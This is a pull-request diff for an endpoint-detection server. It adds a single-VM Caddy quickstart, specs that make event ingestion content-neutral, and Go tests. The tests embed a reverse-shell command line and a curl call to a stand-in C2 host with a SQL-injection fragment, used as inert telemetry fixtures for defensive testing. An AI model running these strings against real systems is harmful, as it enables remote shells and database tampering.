+- **`EDR_SECRET_KEY` is added to `docker-compose.prod.yml` + its README** (a latent boot failure: the server requires the deployment root secret unconditionally and the prod stack omitted it). No server behavior change; this is a packaging fix shipped alongside the quickstart.
+
+### Not in this change
+
+- High-availability / multi-replica topology and a no-VM PaaS path. Out of scope for this pass; the quickstart targets a single customer with 10 to 500 endpoints.
+- Upload bandwidth optimization (gzip/zstd, persistent connections, HTTP/2). Tracked separately as getvictor/fleet-edr#405; it is explicitly not the WAF fix and must not be conflated with it.
+- Any change to the server's request handling. The ingest path already behaves as the new `server-event-ingestion` requirement states; the requirement formalizes an invariant rather than altering behavior.

--- a/openspec/changes/single-vm-getting-started/specs/server-availability/spec.md
+++ b/openspec/changes/single-vm-getting-started/specs/server-availability/spec.md
@@ -1,0 +1,13 @@
+# Server availability: operator-controlled edge delta
+
+## ADDED Requirements
+
+### Requirement: The default getting-started deployment controls its own edge
+
+The default getting-started deployment SHALL be a single host the operator controls, fronted by a plain reverse proxy that terminates TLS and forwards requests without content inspection, so the authenticated agent ingest and command routes (`POST /api/events`, `POST /api/enroll`, `GET /api/commands`, `PUT /api/commands/*`) are never subjected to a managed web application firewall. The authenticated bearer token, not edge content inspection, SHALL be the control for this machine-to-machine traffic. A deployment whose public edge runs a content-inspecting WAF the operator cannot disable (a managed PaaS edge) SHALL be supported only when the operator exempts those routes from inspection, and the operator documentation SHALL warn that the edge otherwise blocks agent telemetry.
+
+#### Scenario: Agent telemetry carrying attack signatures reaches the server
+
+- **GIVEN** the default single-host topology whose public edge is a plain reverse proxy with no managed ruleset
+- **WHEN** an enrolled agent uploads an event batch whose payloads contain attack signatures (a reverse-shell command line and a C2 URL with a SQL-injection fragment)
+- **THEN** the request reaches the server and is handled by the ingest endpoint, accepted and persisted, rather than being blocked by the edge before it arrives

--- a/openspec/changes/single-vm-getting-started/specs/server-event-ingestion/spec.md
+++ b/openspec/changes/single-vm-getting-started/specs/server-event-ingestion/spec.md
@@ -1,0 +1,19 @@
+# Server event ingestion: content-neutral acceptance delta
+
+## ADDED Requirements
+
+### Requirement: Ingest acceptance is content-neutral
+
+The authenticated event-ingest path SHALL decide acceptance solely on host-token authentication, structural request validation (JSON shape, per-request event count, body size, and host-id match), and server health. It SHALL NOT inspect event payload content for attack signatures, and SHALL NOT reject a batch because its captured command lines, file paths, or network indicators resemble an attack. Agent telemetry legitimately carries such strings, so content inspection belongs to no layer of a supported deployment. Concretely, the path returns `200` on success, `401` for a missing or invalid host token, `400` or `413` for a malformed or oversized batch, and `500`/`503` on a server or database error; it SHALL never return a `403` content-block. A `403` reaching an agent is therefore diagnosably produced by an edge in front of the server, not by the server.
+
+#### Scenario: A batch whose contents resemble an attack is accepted
+
+- **GIVEN** an enrolled host whose host token pins its `host_id`
+- **WHEN** it submits a well-formed event batch whose payload fields contain attack signatures (a reverse-shell command line, a C2 URL, and a SQL-injection fragment)
+- **THEN** the server accepts the batch with `200` and persists its events, identically to a benign batch of the same shape
+
+#### Scenario: The ingest path never returns a content-block status
+
+- **GIVEN** any request to the authenticated ingest path, across its success and validation-failure outcomes
+- **WHEN** the server handles it
+- **THEN** the response status is `200` (success), `401` (authentication), `400` or `413` (validation), or `500`/`503` (server), and never `403`

--- a/openspec/changes/single-vm-getting-started/tasks.md
+++ b/openspec/changes/single-vm-getting-started/tasks.md
@@ -1,0 +1,37 @@
+# Single-VM getting-started with an operator-controlled edge: tasks
+
+## 1. Quickstart stack
+
+- [x] `docker-compose.quickstart.yml`: MySQL + server + Caddy. Server in proxy-terminated TLS mode (`EDR_TLS_TERMINATED_BY_PROXY=1`), plaintext on the private network, no host port published; only Caddy is internet-facing (80/443). Secrets via docker-secret files. Forwards `OTEL_EXPORTER_OTLP_ENDPOINT` / `OTEL_EXPORTER_OTLP_HEADERS` / `OTEL_RESOURCE_ATTRIBUTES` from `.env`.
+- [x] `packaging/caddy/Caddyfile`: `{$EDR_DOMAIN} { reverse_proxy http://server:8088 }`. Auto-HTTPS via Let's Encrypt, plain proxy, no managed ruleset.
+- [x] `bootstrap.sh`: one command (`EDR_DOMAIN=... EDR_VERSION=... ./bootstrap.sh`). Idempotent secret generation (never rotates the enroll secret out from under enrolled agents), writes `.env`, brings the stack up, prints the enroll secret + break-glass grep.
+- [x] `bootstrap.sh`: write the secret files `0644`, not `0600`. Compose bind-mounts a file secret with the host file's owner and mode (uid/gid/mode long-syntax options are Swarm only), and the server image runs as nonroot, so a `0600` file owned by the host user is unreadable inside the container and the server crash-loops on "permission denied". Caught by the end-to-end VM run. Same fix applied to `docker-compose.prod.README.md`.
+
+## 2. Docs
+
+- [x] `docs/quickstart-vm.md`: prereqs, six steps, operations (upgrade, backups, enroll-secret rotation, OIDC later), a "Send telemetry to a collector" OTel section, and a "Why no WAF here" section.
+- [x] `docs/deploy-render.md`: `[!WARNING]` block at the top (edge WAF blocks agent telemetry, cannot self-disable, two workarounds, pointer to the quickstart as the recommended path).
+- [x] `README.md` + `docs/README.md`: promote the single-VM quickstart to the recommended getting-started path; demote Render to a caveated alternative.
+
+## 3. Packaging fix
+
+- [x] `docker-compose.prod.yml`: add `EDR_SECRET_KEY_FILE: /run/secrets/secret_key` + the `secret_key` docker-secret. The server requires the deployment root secret unconditionally (`server/config/config.go` `loadSecretKey`); the prod stack omitted it and would fail to boot.
+- [x] `docker-compose.prod.README.md`: generate `secrets/secret_key` (`openssl rand -hex 32`) in one-time setup; note it is effectively un-rotatable (rotating invalidates every enrolled host).
+
+## 4. Spec
+
+- [x] `server-event-ingestion` delta: ADDED requirement "Ingest acceptance is content-neutral" with the attack-signature-accepted and never-content-block scenarios.
+- [x] `server-availability` delta: ADDED requirement "The default getting-started deployment controls its own edge" with the attack-signature-telemetry-reaches-the-server scenario.
+
+## 5. Tests
+
+- [x] `server/detection/internal/intake/handler_test.go`: `TestParseAndValidateIngestBody_ContentNeutral` pins that an attack-signature batch parses identically to a benign one and that the parser's status surface never includes `403`. Scenario markers on both subtests.
+- [x] `server/detection/internal/tests/integration_test.go`: `TestIngest_AttackSignatureTelemetryReachesServer` POSTs an attack-signature batch through the real HTTP ingest path and asserts `200` + both events persisted. Scenario marker for the `server-availability` topology requirement.
+
+## 6. Verification
+
+- [x] `go test ./server/detection/internal/intake/` green.
+- [x] `go test -tags=integration ./server/detection/internal/tests/ -run TestIngest_AttackSignatureTelemetryReachesServer` green (real MySQL).
+- [x] `docker compose -f docker-compose.quickstart.yml config` renders with `EDR_DOMAIN`/`EDR_VERSION` set; `bash -n bootstrap.sh` clean.
+- [ ] `openspec validate single-vm-getting-started --strict`; spectrace; dash + markdown-prose lints.
+- [x] End-to-end on a throwaway Azure VM (`temp.fleetdm.site`): Caddy issued the Let's Encrypt cert (verified trusted), `/readyz` 200 over public HTTPS, a host enrolled, and an attack-signature batch (reverse shell + C2 URL + SQL-injection) uploaded through the edge returned `200 {"accepted":2}`. The same body without a token returned the app's `401` (`via: 1.1 Caddy`), never a content-inspecting `403`. Surfaced and fixed the `0600` secret-file permission bug above.

--- a/packaging/caddy/Caddyfile
+++ b/packaging/caddy/Caddyfile
@@ -1,0 +1,11 @@
+# Public HTTPS for the EDR server, used by docker-compose.quickstart.yml.
+#
+# Caddy obtains and renews a Let's Encrypt certificate for $EDR_DOMAIN
+# automatically (ACME HTTP-01 / TLS-ALPN over ports 80 and 443, which must be
+# reachable from the internet), then reverse-proxies every request to the server
+# on the private Docker network. It is a plain reverse proxy: no content
+# inspection, no managed WAF, so security telemetry uploads are never flagged as
+# attacks. The server enforces its own request-body cap, so none is set here.
+{$EDR_DOMAIN} {
+	reverse_proxy http://server:8088
+}

--- a/server/detection/internal/intake/handler_test.go
+++ b/server/detection/internal/intake/handler_test.go
@@ -10,6 +10,66 @@ import (
 	"github.com/stretchr/testify/require"
 )
 
+// attackSignatureBatch is a well-formed event batch whose payload fields are stuffed with the kind of strings a
+// content-inspecting WAF matches on: a reverse-shell command line, a SQL-injection fragment, and a C2 beacon URL. It is the
+// captured-telemetry shape that gets a managed PaaS edge to return 403 before the request reaches the server (the production
+// incident behind the single-VM quickstart). The parser must treat it identically to any benign batch.
+const attackSignatureBatch = `[` +
+	`{"event_id":"e1","host_id":"host-a","timestamp_ns":1000,"event_type":"exec",` +
+	`"payload":{"path":"/bin/bash","args":["bash","-c","bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"]}},` +
+	`{"event_id":"e2","host_id":"host-a","timestamp_ns":1001,"event_type":"exec",` +
+	`"payload":{"path":"/usr/bin/curl","args":["curl","http://evil.example/c2?q=1' OR '1'='1; DROP TABLE users;--"]}}` +
+	`]`
+
+// TestParseAndValidateIngestBody_ContentNeutral pins that the authenticated ingest parser decides acceptance on structure
+// alone, never on what the events say. A batch whose contents resemble an attack parses to 200 exactly like a benign batch,
+// and across the parser's whole error surface the status is never 403: content inspection belongs to no layer of a supported
+// deployment, so a 403 can only come from an edge the operator should not have in the path. This is the server-side half of
+// the WAF diagnosis that motivated docs/quickstart-vm.md.
+func TestParseAndValidateIngestBody_ContentNeutral(t *testing.T) {
+	t.Parallel()
+
+	t.Run("spec:server-event-ingestion/ingest-acceptance-is-content-neutral/a-batch-whose-contents-resemble-an-attack-is-accepted", func(t *testing.T) {
+		t.Parallel()
+		benign := `[{"event_id":"e1","host_id":"host-a","timestamp_ns":1000,"event_type":"exec",` +
+			`"payload":{"path":"/usr/bin/true","args":["true"]}}]`
+
+		benignEvents, benignStatus, benignErr := ParseAndValidateIngestBody([]byte(benign), "host-a")
+		require.Equal(t, http.StatusOK, benignStatus, "benign batch must be accepted")
+		require.Empty(t, benignErr)
+
+		attackEvents, attackStatus, attackErr := ParseAndValidateIngestBody([]byte(attackSignatureBatch), "host-a")
+		require.Equal(t, http.StatusOK, attackStatus, "attack-signature batch must be accepted identically to a benign one")
+		require.Empty(t, attackErr, "the parser must not reject on payload content")
+		assert.Len(t, attackEvents, 2)
+		assert.Len(t, benignEvents, 1)
+	})
+
+	t.Run("spec:server-event-ingestion/ingest-acceptance-is-content-neutral/the-ingest-path-never-returns-a-content-block-status", func(t *testing.T) {
+		t.Parallel()
+		// Drive the parser across its full outcome surface: success, the attack-signature success, and each validation
+		// failure. None of them may be 403; the only statuses the ingest path emits are 200, 400, and 413 (auth 401 lives
+		// in the host-token middleware, which is likewise never 403, see hosttoken_test.go).
+		cases := []struct {
+			name string
+			body string
+		}{
+			{"valid benign batch", `[{"event_id":"e1","host_id":"host-a","timestamp_ns":1,"event_type":"exec","payload":{}}]`},
+			{"attack-signature batch", attackSignatureBatch},
+			{"not JSON", `not json`},
+			{"foreign host_id", `[{"event_id":"e1","host_id":"host-b","timestamp_ns":1,"event_type":"exec","payload":{}}]`},
+			{"missing field", `[{"host_id":"host-a","timestamp_ns":1,"event_type":"exec","payload":{}}]`},
+		}
+		for _, tc := range cases {
+			t.Run(tc.name, func(t *testing.T) {
+				_, status, _ := ParseAndValidateIngestBody([]byte(tc.body), "host-a")
+				assert.NotEqual(t, http.StatusForbidden, status, "ingest must never reject with a content-block 403")
+				assert.Contains(t, []int{http.StatusOK, http.StatusBadRequest, http.StatusRequestEntityTooLarge}, status)
+			})
+		}
+	})
+}
+
 // TestHandleReadyz_Draining pins that once the drain gate reports draining, /readyz returns 503 with status "draining" so a load
 // balancer removes this replica from rotation. The store is nil here, which would otherwise make readyz report "degraded": the
 // assertion on status="draining" proves the drain check takes precedence over the DB check (the contract the LB depends on).

--- a/server/detection/internal/tests/integration_test.go
+++ b/server/detection/internal/tests/integration_test.go
@@ -377,6 +377,42 @@ func TestIngest_PersistsEvents(t *testing.T) {
 	assert.Equal(t, int64(1), hosts[0].EventCount)
 }
 
+// TestIngest_AttackSignatureTelemetryReachesServer drives an end-to-end POST /api/events whose payloads carry the strings a
+// content-inspecting WAF blocks on (a reverse-shell command line and a C2 URL with a SQL-injection fragment). Through the
+// default getting-started edge (a plain reverse proxy with no managed ruleset, mirrored here by the bare httptest server in
+// front of the real ingest handler) the request reaches the server and is accepted and persisted, not blocked. This is the
+// supported-topology guarantee behind docs/quickstart-vm.md: the managed-PaaS 403 the agent hit in production is an edge
+// artifact, never the server's behavior.
+//
+// spec:server-availability/the-default-getting-started-deployment-controls-its-own-edge/agent-telemetry-carrying-attack-signatures-reaches-the-server
+func TestIngest_AttackSignatureTelemetryReachesServer(t *testing.T) {
+	t.Parallel()
+	d := newDetection(t, detectionOpts{mode: bootstrap.ModeFull})
+	ctx := t.Context()
+
+	srv := httptest.NewServer(withHostID(d.Service().IngestHandler(), "host-a"))
+	t.Cleanup(srv.Close)
+
+	body := `[` +
+		`{"event_id":"e1","host_id":"host-a","timestamp_ns":1000,"event_type":"exec",` +
+		`"payload":{"path":"/bin/bash","args":["bash","-c","bash -i >& /dev/tcp/10.0.0.1/4444 0>&1"]}},` +
+		`{"event_id":"e2","host_id":"host-a","timestamp_ns":1001,"event_type":"exec",` +
+		`"payload":{"path":"/usr/bin/curl","args":["curl","http://evil.example/c2?q=1' OR '1'='1; DROP TABLE users;--"]}}` +
+		`]`
+	req, err := http.NewRequestWithContext(ctx, http.MethodPost, srv.URL, strings.NewReader(body))
+	require.NoError(t, err)
+	req.Header.Set("Content-Type", "application/json")
+	resp, err := srv.Client().Do(req)
+	require.NoError(t, err)
+	defer resp.Body.Close()
+	require.Equal(t, http.StatusOK, resp.StatusCode, "attack-signature telemetry must be accepted, never content-blocked")
+
+	hosts, err := d.Service().ListHosts(ctx)
+	require.NoError(t, err)
+	require.Len(t, hosts, 1)
+	assert.Equal(t, int64(2), hosts[0].EventCount, "both attack-signature events must persist")
+}
+
 // spec:server-event-ingestion/host-identity-pinning/a-batch-contains-a-foreign-host-id
 func TestIngest_HostIDMismatchRejected(t *testing.T) {
 	t.Parallel()


### PR DESCRIPTION
… edge

Render's Cloudflare edge WAF returns 403 on agent telemetry: captured command lines, file paths, and C2/malware indicators legitimately carry attack signatures, which a content-inspecting edge flags and blocks before the request reaches the app. Render exposes no customer-configurable WAF on any plan, so the structural fix is to keep the authenticated ingest path off any managed-PaaS edge.

Make the default getting-started a single VM the operator controls:

- docker-compose.quickstart.yml (MySQL + server + Caddy), packaging/caddy/ Caddyfile, and bootstrap.sh stand the stack up with one command. Caddy obtains a Let's Encrypt cert automatically and reverse-proxies as a plain proxy with no managed ruleset, so the operator manages zero certs and no WAF sits in the agent path.
- docs/quickstart-vm.md walkthrough, including an OTel "send telemetry to a collector" section; README.md + docs/README.md promote it as recommended.
- docs/deploy-render.md demoted with a warning and the two workarounds.
- docker-compose.prod.yml + README: add the required EDR_SECRET_KEY secret (the stack could not boot without it), and write secret files 0644 not 0600 (Compose file-secrets keep the host mode; the nonroot server image cannot read a host-owned 0600 file and crash-loops).
- openspec change pins two invariants with tests: ingest acceptance is content-neutral / never 403 (server-event-ingestion), and the default topology controls its own edge (server-availability).

Verified end-to-end on a throwaway VM: Caddy issued a trusted LE cert, a host enrolled, and an attack-signature batch uploaded through the edge returned 200; the same body without a token returned the app's 401, never a content-inspecting 403.

<!-- Keep this short. Delete sections that do not apply. -->

## What & why



## Checklist

- [ ] **OpenSpec updated for behavior changes.** If this PR changes observable behavior (a detection rule, the event
      wire schema, persistence semantics, an API/wire shape, or an emitted event), `openspec/specs/**` is updated (and
      an `openspec/changes/` proposal added), with a `spec:<id>` test marker for any new/renamed scenario. Only if this
      PR changes NO observable behavior (a comment / refactor / gofmt / dep bump that happens to touch a scoped path)
      may you assert `no-behavior-change` (label or `[no-behavior-change]` in the title) to clear the OpenSpec-sync gate.
      That is an assertion a reviewer will check, not a way to skip the spec for a real behavior change.
- [ ] Tests added/updated for the change (unit / integration / efficacy / UI as applicable).
- [ ] Agent/extension change touching ESF, XPC, or the event wire format: exercised on a live macOS VM before RC
      (flagged below).

## VM / RC notes (if applicable)




<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

## Release Notes

* **New Features**
  * Added single-VM quickstart deployment with automatic TLS termination and Let's Encrypt certificate management
  * Introduced bootstrap script for automated server deployment setup

* **Documentation**
  * New single-VM deployment quickstart guide
  * Updated deployment recommendations to prioritize operator-controlled infrastructure
  * Added warning about managed-edge WAF interference on Render deployments
  * Clarified event ingestion acceptance requirements

* **Bug Fixes**
  * Added missing secret key configuration for production deployments

<!-- end of auto-generated comment: release notes by coderabbit.ai -->